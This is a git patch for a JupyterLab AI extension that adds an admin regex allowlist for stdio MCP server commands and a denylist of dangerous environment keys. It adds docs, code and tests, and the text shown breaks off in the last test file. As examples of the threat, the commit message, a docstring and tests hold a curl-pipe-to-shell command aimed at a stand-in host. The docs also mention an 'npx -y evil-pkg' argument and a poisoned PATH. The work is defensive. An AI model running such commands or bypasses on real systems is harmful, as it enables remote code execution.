From 39c615dc09d1e52a1a48ec18cd05825778a4965f Mon Sep 17 00:00:00 2001
From: PJ Doland <pj@doland.org>
Date: Sun, 17 May 2026 23:32:28 -0400
Subject: [PATCH 1/2] feat(mcp): add admin allowlist for stdio MCP server
 commands

MCP servers configured with a stdio transport are spawned as subprocesses
of the JupyterLab server user, with full filesystem and network reach.
Both the Claude CLI mcp add path and the in-process mcp.json loader
forwarded the user-supplied command verbatim to the kernel, validating
only flag-smuggling. A social-engineered or LLM-suggested config like
{command: 'sh', args: ['-c', 'curl evil|sh']} landed as RCE on the next
session start.

Add an opt-in regex allowlist plumbed via mcp_stdio_command_allowlist
(traitlet on NotebookIntelligence) and NBI_MCP_STDIO_COMMAND_ALLOWLIST
(CSV env that appends to the traitlet, via the existing
_resolve_csv_appended helper). When non-empty, every stdio MCP server,
whether added via Claude mcp add or loaded from mcp.json, must match at
least one pattern. Empty list (the default) means no enforcement so
existing per-user deployments are unaffected.

The binary-name gate is paired with a fixed denylist of dangerous env
keys (PATH, LD_PRELOAD, LD_LIBRARY_PATH, LD_AUDIT, DYLD_*, PYTHONPATH,
PYTHONSTARTUP, PYTHONHOME, NODE_OPTIONS, NODE_PATH, BASH_ENV, ENV)
applied to every stdio MCP entry regardless of allowlist state. Without
that companion check, a poisoned PATH would resolve an allowlisted
binary name to attacker-controlled code, and LD_PRELOAD-style preloads
would inject a shared object before the binary's entry point runs.

Failure handling matches the surrounding context at each gate: the
ClaudeMCPManager.add_server REST POST raises ValueError to surface a
400 with the operator's message, while MCPManager.create_mcp_server
warns and skips so one bad mcp.json entry cannot take the others
offline. URL transports are not gated (they don't fork a local process;
HTTPS-only continues to apply); args are not gated either, and the
helptext and admin-guide section call this out as a known scope
limitation that admins close by pointing command at a wrapper script
they own.
---
 docs/admin-guide.md                         |  32 ++++-
 notebook_intelligence/ai_service_manager.py |  14 +-
 notebook_intelligence/claude_mcp_manager.py |  25 +++-
 notebook_intelligence/extension.py          |  50 ++++++-
 notebook_intelligence/mcp_manager.py        |  26 +++-
 notebook_intelligence/mcp_policy.py         | 109 ++++++++++++++++
 tests/test_claude_mcp_manager.py            | 108 +++++++++++++++
 tests/test_mcp_manager_command_allowlist.py | 138 ++++++++++++++++++++
 tests/test_mcp_policy.py                    | 114 ++++++++++++++++
 9 files changed, 610 insertions(+), 6 deletions(-)
 create mode 100644 notebook_intelligence/mcp_policy.py
 create mode 100644 tests/test_mcp_manager_command_allowlist.py
 create mode 100644 tests/test_mcp_policy.py

diff --git a/docs/admin-guide.md b/docs/admin-guide.md
index 774ca693..ac783d39 100644
--- a/docs/admin-guide.md
+++ b/docs/admin-guide.md
@@ -105,6 +105,8 @@ The full surface, in one table.
 | `NBI_UPLOAD_MAX_MB`                              | int  | unset                       | env (overrides traitlet)           | Same as above; env takes precedence.                                                                                                                                                                                                                                                                                                                                                                                                                                     |
 | `upload_retention_hours`                         | Int  | `24`                        | traitlet                           | How long staged uploads survive in the temp directory before the next upload sweeps them. `0` keeps only the atexit purge (uploads survive the session).                                                                                                                                                                                                                                                                                                                 |
 | `NBI_UPLOAD_RETENTION_HOURS`                     | int  | unset                       | env (overrides traitlet)           | Same as above; env takes precedence.                                                                                                                                                                                                                                                                                                                                                                                                                                     |
+| `mcp_stdio_command_allowlist`                    | List | `[]`                        | traitlet                           | Regex allowlist for the stdio MCP server `command` field. Empty list (default) means no enforcement; non-empty list rejects any stdio MCP server whose command does not match. Matched with `re.search`; anchor (`^...$`) for literal equality. Applies at both Claude `mcp add` and `mcp.json` load. See [Restricting MCP stdio commands](#restricting-mcp-stdio-commands).                                                                                              |
+| `NBI_MCP_STDIO_COMMAND_ALLOWLIST`                | csv  | unset                       | env (appends to traitlet)          | Comma-separated regex patterns added to the traitlet at startup. Per-pod additions on an org baseline.                                                                                                                                                                                                                                                                                                                                                                   |
 | `tour_config_path`                               | str  | `""`                        | traitlet                           | Filesystem path to a YAML/JSON file with admin overrides for the first-run sidebar tour copy. See [`docs/admin-tour-config.md`](admin-tour-config.md).                                                                                                                                                                                                                                                                                                                   |
 | `NBI_TOUR_CONFIG_PATH`                           | str  | unset                       | env (overrides traitlet)           | Same as above; env takes precedence.                                                                                                                                                                                                                                                                                                                                                                                                                                     |
 | `NBI_GH_ACCESS_TOKEN_PASSWORD`                   | str  | `nbi-access-token-password` | env                                | Password used to encrypt the stored Copilot token in `user-data.json`. **Change in multi-tenant deployments.**                                                                                                                                                                                                                                                                                                                                                           |
@@ -140,7 +142,7 @@ NBI runs entirely inside the user's Jupyter Server process. There is no privileg
   - `nbi-command-execute` runs arbitrary shell commands.
   - `nbi-file-edit` and `nbi-file-read` read and write any file the user can.
   - `nbi-notebook-edit` and `nbi-notebook-execute` modify and run notebooks.
-- **MCP stdio servers** are launched as user subprocesses with the user's environment. NBI does not sandbox them.
+- **MCP stdio servers** are launched as user subprocesses with the user's environment. NBI does not sandbox them; the optional [`mcp_stdio_command_allowlist`](#restricting-mcp-stdio-commands) gates the binary name and refuses `PATH`/`LD_PRELOAD` style env overrides, but does not validate `args` and does not contain the spawned process.
 - **Claude Code CLI** inherits the user's environment, including filesystem permissions and any auth tokens in `~/.claude/`.
 
 For regulated tenants:
@@ -474,7 +476,33 @@ Reads come from Claude's JSON config files directly (fast, no health checks). Wr
 
 > **Blast radius.** Force-off only kills the _management UI_ — MCP servers already configured in `~/.claude.json` or `<cwd>/.mcp.json` keep loading inside Claude Code sessions because Claude's MCP loader doesn't consult NBI's policy. To stop existing servers, remove them on disk (or via the `claude mcp remove` CLI) before flipping the policy.
 
-> **Trust model.** MCP servers run as subprocesses (stdio transport) or accept arbitrary URLs (sse/http transport) inside Claude Code sessions; NBI does not validate or sandbox the command, environment, or network endpoint beyond rejecting CLI flag-smuggling. For multi-tenant or regulated deployments, default to `claude_mcp_management_policy = force-off` and ship a curated set of servers via `~/.claude/settings.json` instead.
+> **Trust model.** MCP servers run as subprocesses (stdio transport) or accept arbitrary URLs (sse/http transport) inside Claude Code sessions. Beyond CLI flag-smuggling rejection and HTTPS-required URL transports, NBI validates only the binary name against the optional [`mcp_stdio_command_allowlist`](#restricting-mcp-stdio-commands) and refuses a handful of env-key bypasses (`PATH`, `LD_PRELOAD`, `PYTHONPATH`, `NODE_OPTIONS`, etc.) when the gate is engaged. `args` and the spawned process are not contained. For multi-tenant or regulated deployments, prefer `claude_mcp_management_policy = force-off` plus a curated set of servers via `~/.claude/settings.json`.
+
+### Restricting MCP stdio commands
+
+When `mcp_stdio_command_allowlist` is non-empty, every stdio MCP server (whether added via the Claude-mode UI or loaded from `~/.jupyter/nbi/mcp.json`) must match at least one pattern in the list. Empty list (the default) means no enforcement.
+
+```python
+c.NotebookIntelligence.mcp_stdio_command_allowlist = [
+    "^/usr/local/bin/uv$",
+    "^/usr/local/bin/uvx$",
+    "^/usr/local/bin/npx$",
+]
+```
+
+Or via env (appends to the traitlet, useful for per-pod adds on an org baseline):
+
+```
+NBI_MCP_STDIO_COMMAND_ALLOWLIST=^/usr/local/bin/uv$,^/usr/local/bin/uvx$
+```
+
+Patterns use `re.search`, so anchor with `^...$` for literal equality. `"uv"` matches both `uv` and `uvtool`; `"^uv$"` matches only `uv`.
+
+Whenever the gate engages on a stdio server, NBI additionally refuses dangerous env keys (`PATH`, `LD_PRELOAD`, `LD_LIBRARY_PATH`, `LD_AUDIT`, `DYLD_*`, `PYTHONPATH`, `PYTHONSTARTUP`, `PYTHONHOME`, `NODE_OPTIONS`, `NODE_PATH`, `BASH_ENV`, `ENV`) regardless of whether the allowlist is set. This closes the bypass where a poisoned `PATH` resolves an allowlisted binary name to attacker-controlled code, or where a `LD_PRELOAD` injects a shared object into the process before its entry point.
+
+**Scope.** The gate matches the `command` field only. `args` flow through unchecked, so an allowlist that permits `npx` will still accept `args: ['-y', 'evil-pkg']`. If you need argv-level control, point `command` at a wrapper script you own that bakes the safe argv in.
+
+**Behavior on rejection.** Claude-mode `mcp add` returns HTTP 400 with the policy error message so the user sees it in the Settings UI. The `mcp.json` loader logs a warning naming the server and skips it; the rest of the MCP list keeps loading.
 
 ### Disabling the Plugins tab
 
diff --git a/notebook_intelligence/ai_service_manager.py b/notebook_intelligence/ai_service_manager.py
index 8b6061b3..f303a8a6 100644
--- a/notebook_intelligence/ai_service_manager.py
+++ b/notebook_intelligence/ai_service_manager.py
@@ -114,6 +114,15 @@ def get_skill_reconciler(self) -> Optional[SkillReconciler]:
         """Get the managed-skills reconciler, if one is configured."""
         return self._skill_reconciler
 
+    def get_mcp_stdio_command_allowlist(self) -> list[str]:
+        """Return the merged MCP stdio-command regex allowlist (traitlet + env).
+
+        Empty list means no enforcement. Handlers that construct a
+        ``ClaudeMCPManager`` per request read this so the gate stays
+        consistent with the in-process ``MCPManager``.
+        """
+        return list(self._options.get("mcp_stdio_command_allowlist") or [])
+
     @property
     def websocket_connector(self) -> ThreadSafeWebSocketConnector:
         return self._websocket_connector
@@ -131,7 +140,10 @@ def initialize(self):
         self.register_llm_provider(self._openai_compatible_llm_provider)
         self.register_llm_provider(self._litellm_compatible_llm_provider)
         self.register_llm_provider(self._ollama_llm_provider)
-        self._mcp_manager = MCPManager(self.nbi_config.mcp)
+        self._mcp_manager = MCPManager(
+            self.nbi_config.mcp,
+            stdio_command_allowlist=self._options.get("mcp_stdio_command_allowlist") or [],
+        )
         for participant in self._mcp_manager.get_mcp_participants():
             # A duplicate / reserved id from one MCP server should not block
             # the rest from registering — log and continue rather than crash
diff --git a/notebook_intelligence/claude_mcp_manager.py b/notebook_intelligence/claude_mcp_manager.py
index 33c23af3..be2232d9 100644
--- a/notebook_intelligence/claude_mcp_manager.py
+++ b/notebook_intelligence/claude_mcp_manager.py
@@ -32,6 +32,10 @@
     validate_scope,
 )
 from notebook_intelligence.config import _atomic_write_json
+from notebook_intelligence.mcp_policy import (
+    reject_dangerous_env_keys,
+    validate_mcp_stdio_command,
+)
 
 log = logging.getLogger(__name__)
 
@@ -131,9 +135,18 @@ class ClaudeMCPManager:
     # two in-flight `add`s from the same NBI server can clobber.
     _write_lock = asyncio.Lock()
 
-    def __init__(self, working_dir: Optional[str] = None):
+    def __init__(
+        self,
+        working_dir: Optional[str] = None,
+        *,
+        stdio_command_allowlist: Optional[Iterable[str]] = None,
+    ):
         self._working_dir = Path(working_dir) if working_dir else Path.cwd()
         self._user_config_path = Path.home() / ".claude.json"
+        # An empty allowlist means "no enforcement"; the default keeps
+        # per-user deployments permissive. Admins thread their pinned
+        # regex list in via ``stdio_command_allowlist``.
+        self._stdio_command_allowlist: list[str] = list(stdio_command_allowlist or [])
 
     # --- reads ---------------------------------------------------------
 
@@ -201,6 +214,16 @@ async def add_server(
             raise ValueError("Missing command or URL")
         reject_flag_smuggling("name", name)
         reject_flag_smuggling("command_or_url", command_or_url)
+        # Admin-configured allowlist gates the stdio binary against an
+        # opt-in regex list. Default is empty (no enforcement) so existing
+        # single-user deployments stay permissive. URL transports skip the
+        # gate because they don't fork a local process. The env-key check
+        # runs unconditionally because PATH / LD_PRELOAD style bypasses
+        # would otherwise convert a binary-name allowlist into a false
+        # sense of security regardless of whether the allowlist is set.
+        if transport == "stdio":
+            validate_mcp_stdio_command(command_or_url, self._stdio_command_allowlist)
+            reject_dangerous_env_keys(env)
         # For network transports, require HTTPS — `http://`/`file://`/etc.
         # would let a user point Claude at internal endpoints (SSRF) or
         # exfil credentials in plaintext. Stdio is a subprocess, not a URL.
diff --git a/notebook_intelligence/extension.py b/notebook_intelligence/extension.py
index fc4bac3e..f5af5235 100644
--- a/notebook_intelligence/extension.py
+++ b/notebook_intelligence/extension.py
@@ -944,10 +944,16 @@ class ClaudeMCPBaseHandler(PolicyGatedHandler):
         FileNotFoundError: 404,
         TimeoutError: 504,
     }
+    # Set once at startup from the merged (traitlet + env) admin allowlist.
+    # Empty list means no enforcement; consult ``AIServiceManager``.
+    mcp_stdio_command_allowlist: list = []
 
     @property
     def manager(self) -> "ClaudeMCPManager":
-        return ClaudeMCPManager(working_dir=get_jupyter_root_dir() or None)
+        return ClaudeMCPManager(
+            working_dir=get_jupyter_root_dir() or None,
+            stdio_command_allowlist=self.mcp_stdio_command_allowlist,
+        )
 
 
 class ClaudeMCPListHandler(ClaudeMCPBaseHandler):
@@ -2444,6 +2450,40 @@ class NotebookIntelligence(ExtensionApp):
         config=True,
     )
 
+    mcp_stdio_command_allowlist = List(
+        trait=Unicode(),
+        default_value=None,
+        help="""
+        Regex allowlist for the stdio MCP server `command` field. When
+        non-empty, every stdio MCP server (added via Claude `mcp add`
+        and loaded from `mcp.json`) must match at least one pattern;
+        otherwise the admin gate rejects the server. Empty list (the
+        default) means no enforcement.
+
+        Patterns are matched with `re.search`. Anchor with `^...$` to
+        require an exact binary, otherwise `'uv'` matches both `uv` and
+        `uvtool`. Anchor on an absolute path (`'^/usr/local/bin/uv$'`)
+        if you want to defeat PATH-poisoning that points at a different
+        binary with the same basename. The complementary `env` denylist
+        (PATH, LD_PRELOAD, PYTHONPATH, NODE_OPTIONS, etc.) is always
+        applied to stdio servers regardless of this setting.
+
+        Patterns can be added per pod via the
+        `NBI_MCP_STDIO_COMMAND_ALLOWLIST` environment variable (CSV;
+        appends to this list).
+
+        Scope: this gate validates the binary `command` only. `args`
+        flow through unchecked, so an allowlist that permits `npx` will
+        still accept `args: ['-y', 'evil-pkg']`. Admins who need
+        argv-level control should point `command` at a wrapper script
+        they own that bakes the safe argv in.
+
+        Example: ['^uv$', '^uvx$', '^npx$', '^/usr/local/bin/.*']
+        """,
+        allow_none=True,
+        config=True,
+    )
+
     allow_enabling_coding_agent_launchers_with_env = Bool(
         default_value=False,
         help="""
@@ -2842,6 +2882,10 @@ def initialize_ai_service(
                 log.warning(
                     "Ignoring invalid NBI_SKILLS_MANIFEST_INTERVAL=%r", interval_env
                 )
+        mcp_command_allowlist = _resolve_csv_appended(
+            "NBI_MCP_STDIO_COMMAND_ALLOWLIST",
+            self.mcp_stdio_command_allowlist,
+        )
         ai_service_manager = AIServiceManager({
             "server_root_dir": server_root_dir,
             "skills_manifest_sources": manifest_sources,
@@ -2849,6 +2893,7 @@ def initialize_ai_service(
             "managed_skills_token": managed_token,
             "feature_policies": feature_policies,
             "string_overrides": string_overrides,
+            "mcp_stdio_command_allowlist": mcp_command_allowlist,
         })
 
     def initialize_templates(self):
@@ -2971,6 +3016,9 @@ def _setup_handlers(self, web_app, feature_policies: dict, string_overrides: dic
         ClaudeMCPBaseHandler.claude_mcp_management_enabled = not is_force_off(
             feature_policies, "claude_mcp_management"
         )
+        ClaudeMCPBaseHandler.mcp_stdio_command_allowlist = (
+            ai_service_manager.get_mcp_stdio_command_allowlist()
+        )
         PluginsBaseHandler.claude_plugins_management_enabled = not is_force_off(
             feature_policies, "claude_plugins_management"
         )
diff --git a/notebook_intelligence/mcp_manager.py b/notebook_intelligence/mcp_manager.py
index 47f3822b..acaec71b 100644
--- a/notebook_intelligence/mcp_manager.py
+++ b/notebook_intelligence/mcp_manager.py
@@ -23,6 +23,10 @@
 EDITOR_VERSION = f"NotebookIntelligence/{NBI_VERSION}"
 
 from notebook_intelligence.util import ThreadSafeWebSocketConnector, _emit
+from notebook_intelligence.mcp_policy import (
+    reject_dangerous_env_keys,
+    validate_mcp_stdio_command,
+)
 
 log = logging.getLogger(__name__)
 
@@ -510,10 +514,14 @@ async def handle_chat_request(self, request: ChatRequest, response: ChatResponse
             await self.handle_chat_request_with_tools(request, response, options)
 
 class MCPManager:
-    def __init__(self, mcp_config: dict):
+    def __init__(self, mcp_config: dict, stdio_command_allowlist: Optional[list[str]] = None):
         self._websocket_connector: ThreadSafeWebSocketConnector = None
         self._mcp_participants: list[MCPChatParticipant] = []
         self._mcp_servers: list[MCPServer] = []
+        # Admin-configured regex allowlist. Empty list means no enforcement
+        # (the default), matching ClaudeMCPManager so the two MCP entry
+        # points stay consistent.
+        self._stdio_command_allowlist: list[str] = list(stdio_command_allowlist or [])
         self.update_mcp_servers(mcp_config)
 
     @property
@@ -590,6 +598,22 @@ def create_mcp_server(self, server_name: str, server_config: dict):
             command = server_config["command"]
             args = server_config.get("args", [])
             env = server_config.get("env", None)
+            try:
+                validate_mcp_stdio_command(command, self._stdio_command_allowlist)
+                reject_dangerous_env_keys(env)
+            except ValueError as exc:
+                # Log and skip rather than aborting the whole reconcile so
+                # one bad entry can't take the others offline. The session
+                # logs make it clear which server was rejected; the user
+                # sees the missing server in the MCP panel. Warning (not
+                # error) because the policy is working as designed; the
+                # operator triages by checking which server name is named.
+                log.warning(
+                    "MCP server '%s' rejected by admin policy: %s",
+                    server_name,
+                    exc,
+                )
+                return None
             server_env = None
             if env is not None:
                 server_env = mcp_get_default_environment()
diff --git a/notebook_intelligence/mcp_policy.py b/notebook_intelligence/mcp_policy.py
new file mode 100644
index 00000000..3e5e4b83
--- /dev/null
+++ b/notebook_intelligence/mcp_policy.py
@@ -0,0 +1,109 @@
+# Copyright (c) Mehmet Bektas <mbektasgh@outlook.com>
+
+"""Admin-policy gate for MCP stdio commands.
+
+MCP servers configured with a stdio transport are spawned as subprocesses
+of the JupyterLab server user, with full filesystem and network reach.
+The Claude CLI's ``mcp add`` and NBI's own ``mcp.json``-loaded servers
+both accept an arbitrary ``command`` string from user input. Without an
+admin gate, a social-engineered or LLM-suggested config like
+``{"command": "sh", "args": ["-c", "curl evil|sh"]}`` lands as RCE the
+next time the session starts.
+
+This module provides an opt-in regex allowlist for the binary name plus
+an env-key denylist that closes the most common PATH / LD_PRELOAD style
+bypasses. The default state is permissive (empty list, no enforcement)
+so existing per-user deployments keep working; regulated multi-tenant
+deployments can pin the allowed binaries via traitlet or env.
+
+Scope notes for future readers: the regex matches the literal ``command``
+string only. ``args`` flow through unchecked. Admins who need stricter
+argv control should pin the ``command`` to a wrapper script they own
+that bakes the safe argv in. The in-process NBI tools (the ones declared
+under ``built_in_toolsets``) are not MCP and go through a different
+sandbox; this gate does not cover them.
+"""
+
+from __future__ import annotations
+
+import re
+from typing import Iterable, List, Mapping
+
+# Env keys that can convert a name-only allowlist into a full RCE: a
+# poisoned PATH resolves an "allowed" binary name to attacker-controlled
+# code; preload variables inject a shared object into the spawned process
+# before the binary's own entry point runs. Reject these at config time
+# so the binary-name allowlist isn't a false sense of security.
+DANGEROUS_MCP_ENV_KEYS: frozenset = frozenset(
+    {
+        "PATH",
+        "LD_PRELOAD",
+        "LD_LIBRARY_PATH",
+        "LD_AUDIT",
+        "DYLD_INSERT_LIBRARIES",
+        "DYLD_LIBRARY_PATH",
+        "DYLD_FALLBACK_LIBRARY_PATH",
+        "DYLD_FORCE_FLAT_NAMESPACE",
+        "PYTHONPATH",
+        "PYTHONSTARTUP",
+        "PYTHONHOME",
+        "NODE_OPTIONS",
+        "NODE_PATH",
+        "BASH_ENV",
+        "ENV",
+    }
+)
+
+
+def compile_allowlist(patterns: Iterable[str]) -> List[re.Pattern[str]]:
+    """Compile each pattern, raising ValueError with a friendly message on a bad regex."""
+    compiled: List[re.Pattern[str]] = []
+    for pattern in patterns:
+        try:
+            compiled.append(re.compile(pattern))
+        except re.error as exc:
+            raise ValueError(
+                f"Invalid regex in mcp_stdio_command_allowlist: {pattern!r}: {exc}"
+            ) from exc
+    return compiled
+
+
+def validate_mcp_stdio_command(command: str, allowlist: Iterable[str]) -> None:
+    """Raise ``ValueError`` when the allowlist is non-empty and ``command`` matches no pattern.
+
+    Empty allowlist means no enforcement, which is the default behavior.
+    The match is ``re.search``; admins should anchor patterns (``^x$``)
+    when they want literal-binary semantics. Patterns matching anywhere
+    in the string ("``uv``" matches "``uvtool``") are a footgun the
+    helper does not autocorrect.
+    """
+    patterns = list(allowlist)
+    if not patterns:
+        return
+    if not isinstance(command, str) or not command:
+        raise ValueError("MCP stdio command must be a non-empty string")
+    compiled = compile_allowlist(patterns)
+    if not any(p.search(command) for p in compiled):
+        raise ValueError(
+            f"MCP stdio command {command!r} is not in the admin allowlist; "
+            "set NotebookIntelligence.mcp_stdio_command_allowlist or "
+            "NBI_MCP_STDIO_COMMAND_ALLOWLIST to permit it."
+        )
+
+
+def reject_dangerous_env_keys(env: Mapping[str, str] | None) -> None:
+    """Raise ``ValueError`` when ``env`` contains a key from ``DANGEROUS_MCP_ENV_KEYS``.
+
+    Empty/None env passes silently. The check is case-insensitive on the
+    Unix-like keys (POSIX env names are case-sensitive in practice but
+    the dynamic loader honors a few variants in surprising ways, and the
+    cost of being case-insensitive here is zero).
+    """
+    if not env:
+        return
+    for key in env:
+        if isinstance(key, str) and key.upper() in DANGEROUS_MCP_ENV_KEYS:
+            raise ValueError(
+                f"MCP env key {key!r} is not permitted; setting "
+                f"{key.upper()} would bypass the stdio command allowlist."
+            )
diff --git a/tests/test_claude_mcp_manager.py b/tests/test_claude_mcp_manager.py
index 9bae58f5..e9fe596a 100644
--- a/tests/test_claude_mcp_manager.py
+++ b/tests/test_claude_mcp_manager.py
@@ -428,6 +428,114 @@ def test_leading_dash_command_rejected(
                 )
             )
 
+    def test_stdio_command_rejected_by_admin_allowlist(
+        self, claude_home, working_dir, monkeypatch
+    ):
+        # When the admin pins a strict allowlist, a shell-style payload
+        # cannot reach the CLI fork: the validator raises before the
+        # subprocess is invoked at all. The Claude CLI never sees the bad
+        # command.
+        called = []
+
+        async def fake_subprocess(*argv, **kwargs):
+            called.append(argv)
+            raise AssertionError("subprocess should not run when allowlist rejects")
+
+        monkeypatch.setattr(
+            "notebook_intelligence._claude_cli.resolve_claude_cli_path",
+            lambda: "/usr/local/bin/claude",
+        )
+        monkeypatch.setattr(
+            "asyncio.create_subprocess_exec", fake_subprocess
+        )
+        manager = ClaudeMCPManager(
+            working_dir=str(working_dir),
+            stdio_command_allowlist=["^uv$", "^uvx$", "^npx$"],
+        )
+        with pytest.raises(ValueError, match="not in the admin allowlist"):
+            asyncio.run(
+                manager.add_server(
+                    name="evil",
+                    scope="user",
+                    transport="stdio",
+                    command_or_url="sh",
+                    args=["-c", "curl evil|sh"],
+                )
+            )
+        assert called == []
+
+    def test_stdio_command_accepted_when_matches_allowlist(
+        self, claude_home, working_dir, monkeypatch
+    ):
+        async def fake_subprocess(*argv, **kwargs):
+            class _Proc:
+                returncode = 0
+
+                async def communicate(self):
+                    return (b"", b"")
+
+            return _Proc()
+
+        monkeypatch.setattr(
+            "notebook_intelligence._claude_cli.resolve_claude_cli_path",
+            lambda: "/usr/local/bin/claude",
+        )
+        monkeypatch.setattr(
+            "asyncio.create_subprocess_exec", fake_subprocess
+        )
+        manager = ClaudeMCPManager(
+            working_dir=str(working_dir),
+            stdio_command_allowlist=["^uv$", "^uvx$"],
+        )
+        # No exception: the CLI is invoked. The synthesized record is
+        # returned because the post-add read finds no matching entry in
+        # the fake home (we did not stub ~/.claude.json).
+        result = asyncio.run(
+            manager.add_server(
+                name="good",
+                scope="user",
+                transport="stdio",
+                command_or_url="uv",
+            )
+        )
+        assert result.name == "good"
+
+    def test_url_transports_not_subject_to_stdio_allowlist(
+        self, claude_home, working_dir, monkeypatch
+    ):
+        # The allowlist gates stdio fork only. SSE/HTTP transports go
+        # through their own https-required scheme check and the
+        # marketplace URL allowlist (separate concern).
+        async def fake_subprocess(*argv, **kwargs):
+            class _Proc:
+                returncode = 0
+
+                async def communicate(self):
+                    return (b"", b"")
+
+            return _Proc()
+
+        monkeypatch.setattr(
+            "notebook_intelligence._claude_cli.resolve_claude_cli_path",
+            lambda: "/usr/local/bin/claude",
+        )
+        monkeypatch.setattr(
+            "asyncio.create_subprocess_exec", fake_subprocess
+        )
+        manager = ClaudeMCPManager(
+            working_dir=str(working_dir),
+            stdio_command_allowlist=["^never-match$"],
+        )
+        result = asyncio.run(
+            manager.add_server(
+                name="sentry",
+                scope="user",
+                transport="http",
+                command_or_url="https://mcp.sentry.dev/mcp",
+            )
+        )
+        assert result.name == "sentry"
+
 
 class TestRedactArgvForLog:
     def test_redacts_env_values(self):
diff --git a/tests/test_mcp_manager_command_allowlist.py b/tests/test_mcp_manager_command_allowlist.py
new file mode 100644
index 00000000..95e281be
--- /dev/null
+++ b/tests/test_mcp_manager_command_allowlist.py
@@ -0,0 +1,138 @@
+# Copyright (c) Mehmet Bektas <mbektasgh@outlook.com>
+
+"""Tests for the stdio-command allowlist branch of ``MCPManager.create_mcp_server``.
+
+When the admin allowlist is non-empty, an MCP server entry whose
+``command`` does not match any pattern must be skipped (return None) and
+must not advance to the ``MCPServerImpl`` constructor that would spawn
+the subprocess. Empty allowlist (default) keeps the existing permissive
+behavior.
+"""
+
+from __future__ import annotations
+
+from unittest.mock import MagicMock, patch
+
+import pytest
+
+from notebook_intelligence.mcp_manager import MCPManager
+
+
+def _make_manager(allowlist=None):
+    # Bypass __init__ to skip the update_mcp_servers call that would
+    # walk a real config; the tests construct the manager directly.
+    manager = MCPManager.__new__(MCPManager)
+    manager._websocket_connector = None
+    manager._mcp_participants = []
+    manager._mcp_servers = []
+    manager._stdio_command_allowlist = list(allowlist or [])
+    return manager
+
+
+class TestCreateMCPServerAllowlist:
+    def test_permissive_default_creates_server(self):
+        manager = _make_manager()
+        # MCPServerImpl __init__ does not start the worker thread until
+        # connect() is called, so it is safe to construct here. We just
+        # confirm the function reaches the constructor with the supplied
+        # command.
+        with patch(
+            "notebook_intelligence.mcp_manager.MCPServerImpl"
+        ) as mock_impl:
+            result = manager.create_mcp_server(
+                "evil", {"command": "sh", "args": ["-c", "curl evil|sh"]}
+            )
+        assert mock_impl.called
+        # Confirm the stdio params received the command verbatim.
+        _, kwargs = mock_impl.call_args
+        assert kwargs["stdio_params"].command == "sh"
+        assert result is not None
+
+    def test_rejected_command_returns_none_without_constructing_server(self, caplog):
+        manager = _make_manager(["^uv$", "^uvx$", "^npx$"])
+        with patch(
+            "notebook_intelligence.mcp_manager.MCPServerImpl"
+        ) as mock_impl:
+            with caplog.at_level("WARNING", logger="notebook_intelligence.mcp_manager"):
+                result = manager.create_mcp_server(
+                    "evil", {"command": "sh", "args": ["-c", "curl evil|sh"]}
+                )
+        assert result is None
+        # The constructor must not have run, so no subprocess was spawned.
+        assert not mock_impl.called
+        # Operators need to see WHICH server was rejected; the message
+        # carries the server name so they can find it in the config.
+        assert "evil" in caplog.text
+
+    def test_accepted_command_constructs_server(self):
+        manager = _make_manager(["^uv$", "^uvx$"])
+        with patch(
+            "notebook_intelligence.mcp_manager.MCPServerImpl"
+        ) as mock_impl:
+            result = manager.create_mcp_server(
+                "good", {"command": "uv", "args": ["run", "voice-mode"]}
+            )
+        assert mock_impl.called
+        assert result is not None
+
+    def test_url_server_unaffected_by_stdio_allowlist(self):
+        # URL transports do not fork a subprocess; the allowlist gates
+        # stdio commands only. Pin so a future refactor cannot widen the
+        # gate to URL hosts (a separate audit item).
+        manager = _make_manager(["^never-match$"])
+        with patch(
+            "notebook_intelligence.mcp_manager.MCPServerImpl"
+        ) as mock_impl:
+            result = manager.create_mcp_server(
+                "sentry", {"url": "https://mcp.sentry.dev/mcp"}
+            )
+        assert mock_impl.called
+        assert result is not None
+
+    def test_dangerous_env_keys_rejected_regardless_of_allowlist(self):
+        # PATH / LD_PRELOAD / etc. would convert any binary-name
+        # allowlist into a false sense of security, so they are always
+        # rejected for stdio MCP entries, even when the allowlist is
+        # empty (permissive default).
+        manager = _make_manager()  # empty allowlist
+        with patch(
+            "notebook_intelligence.mcp_manager.MCPServerImpl"
+        ) as mock_impl:
+            result = manager.create_mcp_server(
+                "evil",
+                {"command": "uv", "env": {"PATH": "/tmp/evil:/usr/bin"}},
+            )
+        assert not mock_impl.called
+        assert result is None
+
+
+class TestMCPManagerOptionPlumbing:
+    """End-to-end: traitlet -> _resolve_csv_appended -> AIServiceManager
+    options -> MCPManager constructor -> validator on create_mcp_server."""
+
+    def test_option_threads_to_manager_and_gates_create(self, monkeypatch):
+        from notebook_intelligence.extension import _resolve_csv_appended
+
+        monkeypatch.setenv("NBI_MCP_STDIO_COMMAND_ALLOWLIST", "^npx$")
+        resolved = _resolve_csv_appended(
+            "NBI_MCP_STDIO_COMMAND_ALLOWLIST", ["^uv$"]
+        )
+        assert resolved == ["^uv$", "^npx$"]
+
+        manager = MCPManager.__new__(MCPManager)
+        manager._websocket_connector = None
+        manager._mcp_participants = []
+        manager._mcp_servers = []
+        manager._stdio_command_allowlist = list(resolved)
+
+        with patch(
+            "notebook_intelligence.mcp_manager.MCPServerImpl"
+        ) as mock_impl:
+            manager.create_mcp_server("uvx-server", {"command": "uvx"})
+        assert not mock_impl.called, "uvx is not in the resolved allowlist"
+
+        with patch(
+            "notebook_intelligence.mcp_manager.MCPServerImpl"
+        ) as mock_impl:
+            manager.create_mcp_server("npx-server", {"command": "npx"})
+        assert mock_impl.called
diff --git a/tests/test_mcp_policy.py b/tests/test_mcp_policy.py
new file mode 100644
index 00000000..28f1eb12
--- /dev/null
+++ b/tests/test_mcp_policy.py
@@ -0,0 +1,114 @@
+# Copyright (c) Mehmet Bektas <mbektasgh@outlook.com>
+
+"""Tests for ``notebook_intelligence.mcp_policy``.
+
+The MCP stdio command allowlist is an opt-in admin gate. Empty list means
+no enforcement (default, permissive); a non-empty list rejects any
+``command`` that does not match at least one of the supplied regex
+patterns. The gate is applied at both insertion points: the Claude-mode
+``mcp add`` shell-out and the in-process MCP loader that reads
+``mcp.json`` at session start. The two managers share this validator so
+the two surfaces cannot drift.
+"""
+
+from __future__ import annotations
+
+import pytest
+
+from notebook_intelligence.mcp_policy import (
+    DANGEROUS_MCP_ENV_KEYS,
+    compile_allowlist,
+    reject_dangerous_env_keys,
+    validate_mcp_stdio_command,
+)
+
+
+class TestCompileAllowlist:
+    def test_compiles_valid_patterns(self):
+        patterns = compile_allowlist(["^uv$", "^npx$"])
+        assert len(patterns) == 2
